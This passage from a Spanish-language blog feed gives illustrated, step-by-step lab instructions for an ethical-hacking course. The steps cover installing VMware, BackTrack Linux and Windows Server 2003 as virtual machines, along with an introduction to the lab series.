<p style="text-align: justify;"><a href="http://img48.imageshack.us/img48/824/18cs4.jpg" target="_blank"><img src="http://img48.imageshack.us/img48/824/18cs4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>19 -</strong> Seleccionamos ahora el tipo de licencia a utilizar, para este laboratorio utilizaremos la del tipo “por servidor” habilitando 5 conexiones simultáneas.</p>
<p style="text-align: justify;"><a href="http://img76.imageshack.us/img76/6717/19ka2.jpg" target="_blank"><img src="http://img76.imageshack.us/img76/6717/19ka2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>20 -</strong> En esta pantalla debemos ingresar el nombre para nuestro equipo. Así mismo asignaremos una contraseña para el usuario Administrador. Según las políticas de seguridad de una buena contraseña, esta debe estar compuesta por 4 letras mayúsculas, 4 minúsculas y 4 números. Si no asignamos este tipo de contraseña recibiremos una ventana de advertencia, pero igual podemos pasarla por alto.</p>
<p style="text-align: justify;"><a href="http://img222.imageshack.us/img222/536/20ul6.jpg" target="_blank"><img src="http://img222.imageshack.us/img222/536/20ul6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>21 -</strong> Podemos ahora seleccionar el tipo de configuración de red. Contamos con dos opciones: Configuración típica y configuración personalizada. Para este caso, seleccionaremos configuración típica.</p>
<p style="text-align: justify;"><a href="http://img166.imageshack.us/img166/8228/21xp2.jpg" target="_blank"><img src="http://img166.imageshack.us/img166/8228/21xp2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>22 -</strong> Podemos continuar con la configuración de dominio o de <a href="http://es.wikipedia.org/wiki/Grupo_de_trabajo" target="_blank"><strong>grupo de trabajo</strong></a>. Para este caso: GRUPO_TRABAJO.</p>
<p style="text-align: justify;"><a href="http://img102.imageshack.us/img102/4972/22ha4.jpg" target="_blank"><img src="http://img102.imageshack.us/img102/4972/22ha4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>23 -</strong> Terminados estos pasos se reiniciara la máquina. Aparaciendo por fin la pantalla de login a nuestro sistema operativo Windows 2003 Server.</p>
<p style="text-align: justify;"><a href="http://img222.imageshack.us/img222/3821/23jq7.jpg" target="_blank"><img src="http://img222.imageshack.us/img222/3821/23jq7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>24 -</strong> Primer acceso al sistema Windows 2003 Server Enterprise Edition</p>
<p style="text-align: justify;"><a href="http://img503.imageshack.us/img503/3287/24vh1.jpg" target="_blank"><img src="http://img503.imageshack.us/img503/3287/24vh1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>25 -</strong> Veamos ahora como podemos instalar componentes adicionales de Windows. Desde el CD de instalación de windows 2003 Server.</p>
<p style="text-align: justify;"><a href="http://img259.imageshack.us/img259/8721/25xn3.jpg" target="_blank"><img src="http://img259.imageshack.us/img259/8721/25xn3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>26 -</strong> Doble clic en el CD de instalación. Veremos la siguiente pantalla.</p>
<p style="text-align: justify;"><a href="http://img266.imageshack.us/img266/4372/26km3.jpg" target="_blank"><img src="http://img266.imageshack.us/img266/4372/26km3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>27 -</strong> Las siguientes imagenes presentan de manera rápida los componentes a instalar. En otras sesiones del laboratorio profundizaremos sobre los mismos.</p>
<p style="text-align: justify;"><a href="http://img166.imageshack.us/img166/1236/27bd7.jpg" target="_blank"><img src="http://img166.imageshack.us/img166/1236/27bd7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img69.imageshack.us/img69/8981/28ng8.jpg" target="_blank"><img src="http://img69.imageshack.us/img69/8981/28ng8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img234.imageshack.us/img234/7370/28lm4.jpg" target="_blank"><img src="http://img234.imageshack.us/img234/7370/28lm4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img261.imageshack.us/img261/7769/29qs6.jpg" target="_blank"><img src="http://img261.imageshack.us/img261/7769/29qs6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img443.imageshack.us/img443/8613/30oq5.jpg" target="_blank"><img src="http://img443.imageshack.us/img443/8613/30oq5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img70.imageshack.us/img70/2750/31jr2.jpg" target="_blank"><img src="http://img70.imageshack.us/img70/2750/31jr2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>28 -</strong> Proceso de instalación de los componentes adicionales.</p>
<p style="text-align: justify;"><a href="http://img362.imageshack.us/img362/3453/33ji2.jpg" target="_blank"><img src="http://img362.imageshack.us/img362/3453/33ji2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>29 -</strong> Después de instalar estos componentes, se nos pide reiniciar el equipo . Clic en si.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/4900/34ti6.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/4900/34ti6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>30 -</strong> Luego de reiniciar la máquina probamos la conexión a internet. Además hacemos una pequeña prueba de acceso a nuestro servidor Web local <a href="http://es.wikipedia.org/wiki/Internet_Information_Services" target="_blank"><strong>IIS 6.0</strong></a>.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/1543/36eu1.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/1543/36eu1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img264.imageshack.us/img264/195/35lv2.jpg" target="_blank"><img src="http://img264.imageshack.us/img264/195/35lv2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera la segunda sesión laboratorio, hagamos un recuento de lo aprendido.</p>
<p style="text-align: justify;">- Creación de la segunda máquina virtual.<br />
- Instalación de Windows 2003 Server Enterprise Edition.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong><br />
Instalación de VMware Tools.</p>
<p style="text-align: justify;"><strong>Taller libre:</strong><br />
Otras alternativas de virtualización.<br />
El taller pretende dejar al investigador algún tipo de consulta o práctica de desarrollo individual. Para el primer taller dejo la consulta sobre otros sistemas de virtualización.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-ii/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Instalación de máquinas virtuales I</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:02:31 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=13</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El material bibliográfico de estos laboratorios será citado a medida que avancemos en los mismos. Este material es tomado de diversos cursos, diplomados y certificaciones, en los cuales he podido participar, además del material correspondiente a libros que he adquirido con el tiempo, principalmente el libro “<a href="http://www.amazon.com/Practical-Hacking-Techniques-Countermeasures-Spivey/dp/0849370574" target="_blank">Practical Hacking Techniques and Countermeasures</a>”.</p>
<p style="text-align: justify;">El sistema software de virtualización será el mismo utilizado en el libro citado anteriormente: <a href="http://es.wikipedia.org/wiki/VMware" target="_blank"><strong>VMware Workstation</strong></a>, para este caso la versión 6.0 y versión 5.5. Recordar además que es posible utilizar una versión de prueba de este aplicativo por 30 días. Clic para tener más información del programa y llevar a cabo la descarga del mismo &#8211; <strong><a href="http://www.vmware.com/vmwarestore/newstore/wkst601_eval_login.jsp" target="_blank">Versión 6.0.1</a></strong> &#8211; <a href="http://www.vmware.com/vmwarestore/newstore/wkst_eval_login.jsp" target="_blank"><strong>Versión 5.5</strong></a></p>
<p style="text-align: justify;"><span id="more-13"></span>El sistema utilizado como host (donde instalaré el VMware), será una máquina con las siguientes especificaciones técnicas, aunque el programa puede correr con máquinas de más baja capacidad, para más información del aplicativo visitar la <a href="http://www.vmware.com/es/products/desktop/ws_features.html" target="_blank"><strong>página oficial del producto</strong></a></p>
<p style="text-align: justify;"><a href="http://img62.imageshack.us/img62/3479/infokl5.jpg" target="_blank"><img src="http://img62.imageshack.us/img62/3479/infokl5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">El proceso de instalación de este aplicativo no varía y no presenta mayor diferencia a casi la totalidad de instalaciones en entornos Windows, otro aplicativo más que se instala con los típicos “siguiente-siguiente”, solo debe prestarse atención en el momento en que pide confirmar la deshabilitación del autorun de CD’s, esto con el fin de evitar salir abruptamente de la máquina virtual cuando insertamos algún CD.</p>
<p style="text-align: justify;">Para finalizar, solo recordar que el llevar estas técnicas y contramedidas a un laboratorio es idea original del especialista y autor del libro <a href="http://www.virtuallyhacking.com/" target="_blank"><strong>“Practical Hacking Techniques and Countermeasures” &#8211; Mark D. Spivey</strong></a>. Yo trato simplemente de actualizar un poco el contenido, traducir, adaptar e interpretar de la mejor manera, haciendo ver estos laboratorios de un modo más simple a como los presenta el autor, en nuestro idioma y profundizando en los temas que tengo experiencia.</p>
<p style="text-align: justify;">
<p style="text-align: justify;">Luego de instalar el VMware y haber reiniciado el equipo procedemos entonces a ejecutar el programa (doble clic en alguno de los accesos creados por la instalación), para poder llevar a cabo el proceso de instalación de las máquinas virtuales.</p>
<p style="text-align: justify;">Comenzaremos entonces con la instalación de la distribución <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank"><strong>BackTrack</strong></a>. Esta distribución live cd especializada en temas relacionados con la seguridad de la información también puede ser instalada como <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>S.O</strong></a> residente, será esta entonces nuestra opción de <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>Sistema Operativo</strong></a> residente tipo *nix, aprenderemos así como arrancar la live cd y como llevar a cabo la instalación de la misma para que podamos seguir haciendo uso de ella.</p>
<p style="text-align: justify;"><strong>Nota: </strong>Las capturas de pantalla son desarrolladas de la manera más clara e informátiva posible, señalando con recuadros azules los puntos de especial interés.</p>
<p style="text-align: justify;"><strong>Máquina virtual para la distribución BackTrack</strong></p>
<p style="text-align: justify;"><strong>Requerimientos:</strong> Imagen iso o CD de la distribución BackTrack &#8211; Disponibles en el <a href="http://www.remote-exploit.org/backtrack_download.html" target="_blank"><strong>sitio web de descargas del proyecto</strong></a> &#8211; Seleccionar el origen de la imagen iso desde cualquiera de los mirrors disponibles.</p>
<p style="text-align: justify;"><strong>1 -</strong> Clic en nueva máquina virtual</p>
<p style="text-align: justify;"><a href="http://img517.imageshack.us/img517/3572/84980852pi6.jpg" target="_blank"><img src="http://img517.imageshack.us/img517/3572/84980852pi6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>2 -</strong> En el cuadro de diálogo, clic en siguiente.</p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/9966/72349179na6.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/9966/72349179na6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>3 -</strong> Aceptar la configuración típica de la nueva máquina virtual &#8211; Cada investigador puede profundizar en cada una de las diferentes opciones que aparecen en pantalla, para efectos de mejor personalización y apropiación de sus laboratorios.</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/4582/54165850ok8.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/4582/54165850ok8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>4 -</strong> Seleccionar como sistema operativo invitado: Linux; versión: Otro Linux</p>
<p style="text-align: justify;"><a href="http://img254.imageshack.us/img254/3482/77319337cp9.jpg" target="_blank"><img src="http://img254.imageshack.us/img254/3482/77319337cp9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>5 -</strong> En este paso es posible asignar un nombre a nuestra máquina virtual, además de una ruta de almacenamiento de la misma.</p>
<p style="text-align: justify;"><a href="http://img516.imageshack.us/img516/7600/65009105to7.jpg" target="_blank"><img src="http://img516.imageshack.us/img516/7600/65009105to7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>6 -</strong> Pasamos de este modo a la pantalla de configuración de nuestro tipo de red. Tenemos 4 opciones disponibles para este efecto. Una breve descripción de estas opciones será la siguiente:</p>
<p style="text-align: justify;">- <strong>Use bridged networking:</strong> Nuestra máquina virtual tomará una <a href="http://es.wikipedia.org/wiki/Direcci%C3%B3n_IP" target="_blank"><strong>IP</strong></a> propia y con esta será identificada en internet.</p>
<p style="text-align: justify;">- <strong>Use network address translation (NAT- Traducción de dirección de red):</strong> Nuestra máquina virtual tomará la misma IP que nuestra máquina host, haciendo posible la conexión a internet con esta identificación, además de permitirnos crear pequeñas redes virtuales, objetivo primordial de nuestros laboratorios.</p>
<p style="text-align: justify;">- <strong>Use host-only networking:</strong> Conecta nuestra máquina virtual a una red privada virtual en nuestro sistema host.</p>
<p style="text-align: justify;">- <strong>Do not use a network connection:</strong> No usar conexiones de red.</p>
<p style="text-align: justify;">Para nuestros laboratorios utilizaremos en mayor medida la opción ofrecida mediante el acceso <a href="http://es.wikipedia.org/wiki/Network_Address_Translation" target="_blank"><strong>NAT</strong></a>, escojemos entonces este campo.</p>
<p style="text-align: justify;"><a href="http://img159.imageshack.us/img159/4374/31589523kq4.jpg" target="_blank"><img src="http://img159.imageshack.us/img159/4374/31589523kq4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>7 &#8211; </strong>Ahora seleccionamos el tamaño de nuestro disco duro virtual. El tamaño por defecto puede variar según el tamaño real de tu DD, para nuestro sistema BackTrack es suficiente con 4.0 Gigas, las dos opciones adicionales en pantalla:<br />
<strong>Allocate all disk space now: </strong>Nos permite asignar desde un comienzo este espacio real a nuestro disco virtual, mientras que, dejando sin seleccionar esta opción el espacio será ocupado a medida que se haga necesario para la máquina virtual.<br />
<strong>Split disk into 2 GB files: </strong>Permite dividir el espacio asignado en pequeñas particiones de 2 GB.</p>
<p style="text-align: justify;">Para esta máquina dejaremos las opciones asignadas por defecto. Recuerdo de nuevo que cada investigador puede profundizar en cada una de las opciones ofrecidas por el aplicativo de virtualización. Para más información estudiar la <a href="http://www.vmware.com/support/pubs/ws_pubs.html" target="_blank"><strong>documentación del producto</strong>.</a></p>
<p style="text-align: justify;">Con estos sencillos paso hemos creado nuestra primera máquina virtual del laboratorio. La captura de pantalla nos muestra el nombre que le asignamos en pasos anteriores, ubicación e información de los dispositivos.</p>
<p style="text-align: justify;"><a href="http://img99.imageshack.us/img99/4448/fincw5.jpg" target="_blank"><img src="http://img99.imageshack.us/img99/4448/fincw5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Pasemos ahora a la carga de nuestra LiveCD BackTrack, para su posterior instalación.</p>
<p style="text-align: justify;">Dependiendo de la opción de grabación de la <a href="http://es.wikipedia.org/wiki/Imagen_ISO" target="_blank"><strong>imagen iso</strong></a>, podremos arrancar la misma desde la unidad de CD virtual o desde la <a href="http://es.wikipedia.org/wiki/Imagen_ISO" target="_blank"><strong>imagen iso</strong></a>. &#8211; Esta opción puede seleccionarse dando doble clic en CD-ROM (IDE), usar drive físico (imagen grabada de la <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank"><strong>distro</strong></a>), ó usando <a href="http://es.wikipedia.org/wiki/Imagen_ISO" target="_blank"><strong>imagen iso</strong></a> (seleccionar, buscar y aceptar-ok).</p>
<p style="text-align: justify;">Clic en <strong><em>Start this virtual machine</em></strong> el panel <em><strong>Commands</strong></em>.</p>
<p style="text-align: justify;"><strong>8 -</strong> Cargará la <a href="http://es.wikipedia.org/wiki/BIOS" target="_blank"><strong>BIOS</strong></a> de nuestra máquina virtual.</p>
<p style="text-align: justify;"><a href="http://img54.imageshack.us/img54/273/88408691vv1.jpg" target="_blank"><img src="http://img54.imageshack.us/img54/273/88408691vv1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>9 -</strong> Comienza el sistema de <a href="http://es.wikipedia.org/wiki/Booteo" target="_blank"><strong>booteo</strong></a> de backTrack.</p>
<p style="text-align: justify;"><a href="http://img125.imageshack.us/img125/1193/10lu0.jpg" target="_blank"><img src="http://img125.imageshack.us/img125/1193/10lu0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>10 -</strong> Termina de reconocer y configurar algunos de los dispositivos físicos, luego de cargar estos dispositivos nos ofrece una pantalla de bienvenida, con información de configuración, además de una pantalla de <a href="http://es.wikipedia.org/wiki/Login" target="_blank"><strong>login</strong></a>. La pantalla nos invita a configurar nuestro sistema con algunos comandos, después de logearnos como root.</p>
<p style="text-align: justify;"><a href="http://img223.imageshack.us/img223/7536/11od8.jpg" target="_blank"><img src="http://img223.imageshack.us/img223/7536/11od8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>11 -</strong> Para logearnos en el sistema ingresamos:<br />
usuario: <strong>root</strong><br />
contraseña: <strong>toor</strong></p>
<p style="text-align: justify;"><a href="http://img204.imageshack.us/img204/2664/12oo4.jpg" target="_blank"><img src="http://img204.imageshack.us/img204/2664/12oo4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>12 -</strong> Como desde un comienzo seleccionamos la opción de acceso a la red mediante NAT, podemos observar gracias al comando <a href="http://es.wikipedia.org/wiki/Ifconfig" target="_blank"><strong>ifconfig</strong></a> nuestras interfaces de redes.</p>
<p style="text-align: justify;"><a href="http://img106.imageshack.us/img106/7615/13ab6.jpg" target="_blank"><img src="http://img106.imageshack.us/img106/7615/13ab6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>13 -</strong> Luego podemos cargar el <a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>entorno gráfico</strong></a> de BackTrack mediante el siguiente comando:<br />
<a href="http://es.tldp.org/FAQ/FAQ_Linux/Html/FAQ_Linux-6.html" target="_blank"><strong>startx</strong></a></p>
<p style="text-align: justify;"><a href="http://img130.imageshack.us/img130/4568/14jg6.jpg" target="_blank"><img src="http://img130.imageshack.us/img130/4568/14jg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>14 -</strong> Entorno gráfico cargando.</p>
<p style="text-align: justify;"><a href="http://img230.imageshack.us/img230/7319/15bw9.jpg" target="_blank"><img src="http://img230.imageshack.us/img230/7319/15bw9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>15 -</strong> BackTrack cargado como Live CD en su totalidad.</p>
<p style="text-align: justify;"><a href="http://img124.imageshack.us/img124/4858/31hm3.jpg" target="_blank"><img src="http://img124.imageshack.us/img124/4858/31hm3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>16 -</strong> Ahora nos encargaremos de instalar como S.O residente la distribución Live CD, para este efecto debemos como primera medida particionar el disco duro, para llevar a cabo este proceso utilizaremos la utilidad <a href="http://www.guadalinex.org/guadapedia/index.php/Manejo_de_particiones_con_QTParted" target="_blank"><strong>QTParted</strong></a> disponible en la misma distribución BackTrack.<br />
Para encontrar de manera rápida esta utilidad es posible hacer uso de la herramienta buscar, en el menu desplegable de BackTrack, allí debemos ingresar el nombre de la utilidad <strong>QTParted</strong>, en la ubicación <strong>file:/usr, </strong>en no más de 5 segundos encontrará la utilidad, procedemos a darle doble clic en el archivo qtparted ubicado en el subdirectorio sbin/</p>
<p style="text-align: justify;"><a href="http://img444.imageshack.us/img444/1881/17rr2.jpg" target="_blank"><img src="http://img444.imageshack.us/img444/1881/17rr2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>17 -</strong> Ejecutamos la utilidad <a href="http://www.guadalinex.org/guadapedia/index.php/Manejo_de_particiones_con_QTParted" target="_blank"><strong>QTParted</strong></a> en su versión 0.4.4, seleccionamos el disco duro a particionar.</p>
<p style="text-align: justify;"><a href="http://img119.imageshack.us/img119/5701/18ep4.jpg" target="_blank"><img src="http://img119.imageshack.us/img119/5701/18ep4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>18 -</strong> Clic derecho para crear las particiones, como primera partición seleccionaremos la del tipo de partición <a href="http://es.wikipedia.org/wiki/Espacio_de_intercambio" target="_blank"><strong>linux-swap</strong></a>, con un tamaño de 256 MB.</p>
<p style="text-align: justify;"><a href="http://img229.imageshack.us/img229/3352/19zo5.jpg" target="_blank"><img src="http://img229.imageshack.us/img229/3352/19zo5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>19 -</strong> Luego otra partición del tipo <a href="http://es.tldp.org/Manuales-LuCAS/blfs-es/blfs-es-5.0/postlfs/ext3.html" target="_blank"><strong>ext3</strong></a>, con un tamaño de 3.74 GB.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/2122/20tb9.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/2122/20tb9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>20 -</strong> Luego de asignar las futuras particiones procedemos a guardar los cambios.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/408/21io1.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/408/21io1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>21 -</strong> Antes de llevar a cabo las particiones recibiremos un mensaje de advertencia sobre los riesgos de las acciones a realizar, este riesgo esta directamente relacionado con la perdidad de datos, como es una instalación en limpio no perderemos ningún dato. Aprovamos los cambios a realizar.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/9425/22el3.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/9425/22el3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>22 &#8211; </strong>Después de un corto proceso de operaciones, recibiremos el mensaje de completado del particionamiento . Clic en OK para salir de la utilidad <a href="http://www.guadalinex.org/guadapedia/index.php/Manejo_de_particiones_con_QTParted" target="_blank"><strong>QTParted</strong></a>.</p>
<p style="text-align: justify;"><a href="http://img511.imageshack.us/img511/1164/23ej0.jpg" target="_blank"><img src="http://img511.imageshack.us/img511/1164/23ej0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>23 -</strong> Después de particionar el disco duro procederemos a montar las nuevas particiones desde la <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_blank"><strong>linea de comandos (shell)</strong></a>, también disponible de manera directa desde la barra de tareas de BackTrack.</p>
<p style="text-align: justify;"><a href="http://img72.imageshack.us/img72/6089/24rg6.jpg" target="_blank"><img src="http://img72.imageshack.us/img72/6089/24rg6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>24 &#8211; </strong>Ejecutamos la herramienta disponible en BackTrack (BackTrack installer), para instalar la distribución como <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>S.O</strong></a>, residente. Para el laboratorio seleccionaré el método de instalación real , lueg, clic en <strong><em>Install.<br />
</em></strong><br />
<a href="http://img212.imageshack.us/img212/441/26du0.jpg" target="_blank"><img src="http://img212.imageshack.us/img212/441/26du0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>25 -</strong> Proceso de instalación de BackTrack.</p>
<p style="text-align: justify;"><a href="http://img513.imageshack.us/img513/4656/27db7.jpg" target="_blank"><img src="http://img513.imageshack.us/img513/4656/27db7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>26 -</strong> Instalación completa, clic en cerrar.</p>
<p style="text-align: justify;"><a href="http://img264.imageshack.us/img264/3429/28pw8.jpg" target="_blank"><img src="http://img264.imageshack.us/img264/3429/28pw8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>27 -</strong> Procedemos en este momento a reiniciar nuestra máquina virtual.</p>
<p style="text-align: justify;"><a href="http://img341.imageshack.us/img341/3343/29jk2.jpg" target="_blank"><img src="http://img341.imageshack.us/img341/3343/29jk2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>28 -</strong> Teclas <strong>Ctrl</strong> + <strong>Alt</strong> + <strong>Supr</strong>, para reiniciar la máquina, recordar sacar el CD de BackTrack, para que cargue nuestro nuevo <a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank"><strong>S.O</strong></a> desde el disco duro.</p>
<p style="text-align: justify;"><a href="http://img381.imageshack.us/img381/4585/30nk0.jpg" target="_blank"><img src="http://img381.imageshack.us/img381/4585/30nk0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>29 -</strong> Después de reiniciar la máquina podemos disfrutar de la distribución BackTrack como sistema residente.</p>
<p style="text-align: justify;"><a href="http://img299.imageshack.us/img299/788/34kg8.jpg" target="_blank"><img src="http://img299.imageshack.us/img299/788/34kg8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>30 -</strong> Probando el acceso a internet desde BackTrack.</p>
<p style="text-align: justify;"><a href="http://img413.imageshack.us/img413/6198/35ds1.jpg" target="_blank"><img src="http://img413.imageshack.us/img413/6198/35ds1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera la primera sesión laboratorio, hagamos un recuento de lo aprendido.</p>
<p style="text-align: justify;">- Introducción y descripción de los laboratorios.<br />
- Recursos necesarios para los laboratorios.<br />
- Instalación del aplicativo software de virtualización VMware.<br />
- Creación de la primera máquina virtual.<br />
- Instalación de BackTrack como S.O residente.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong><br />
Instalación de Windows Server 2003 Edición Enterprise</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking, Técnicas y Contramedidas. Introducción y Contenido</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido#comments</comments>
		<pubDate>Tue, 12 Aug 2008 13:24:34 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Auditoría]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Herramientas]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=1</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El objetivo de los Laboratorios de Hacking &#8211; Técnicas y Contramedidas, es ofrecer de manera ordenada y secuencial, las técnicas, tácticas y contramedidas utilizadas en los diferentes campos de la seguridad informática, principalmente los que corresponden a test de penetración y hacking ético.</p>
<p><strong>Algunas notas aclaratorias:</strong></p>
<p>Los términos utilizados en los laboratorios referentes a “hacking”, “hacker”, etc, son bajo la definición de especialistas en seguridad y sistemas informáticos. Muy diferente a la definición que dan algunos medios de información, relacionandolos con delincuentes. Para mí (apreciación personal), las personas que se dedican a causar estragos, robos, y demás actos, reciben la denominación de delincuentes informáticos; (personas que realizan actos delictivos mediante la utilización de herramientas informáticas).</p>
<p style="text-align: justify;"><span id="more-1"></span>El contenido temático de los laboratorios estará dirigido para usuarios con un nivel de conocimientos del tema comprendido entre básico y medio. El material expuesto no está enfocado para usuarios de amplia experiencia en el tema, por el contrario pretende acercar a los entusiastas de aprender y que aún no encuentran la manera de comenzar de un modo más práctico. Pretende refrescar un poco los conocimientos de usuarios avanzados, y pretende invitar a los mismos a desarrollar sus propios laboratorios para el conocimiento de toda la comunidad investigadora.<br />
Los laboratorios pretenden ser lo más práctico posible, obviamente citando las fuentes de profundización para obtener más información sobre los temas tratados.<br />
Casi la totalidad de los laboratorios serán llevados a cabo bajo entornos controlados de instrusión, utilizando máquinas virtuales, con diferentes sistemas operativos, entre ellos “<a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank"><strong>BackTrack</strong></a>”, “<strong><a href="http://es.wikipedia.org/wiki/Opensuse" target="_blank">OpenSuSe Linux</a></strong>”, “<a href="http://www.microsoft.com/latam/windowsserver2003/evaluation/overview/enterprise.mspx" target="_blank"><strong>Windows Server 2003 Edición Enterprise</strong></a>”, “<a href="http://www.netbsd.org/es/" target="_blank"><strong>NetBSD</strong></a>”, entre otros.</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<ul>
<li><strong>Introducción y descripción de los laboratorios.</strong></li>
</ul>
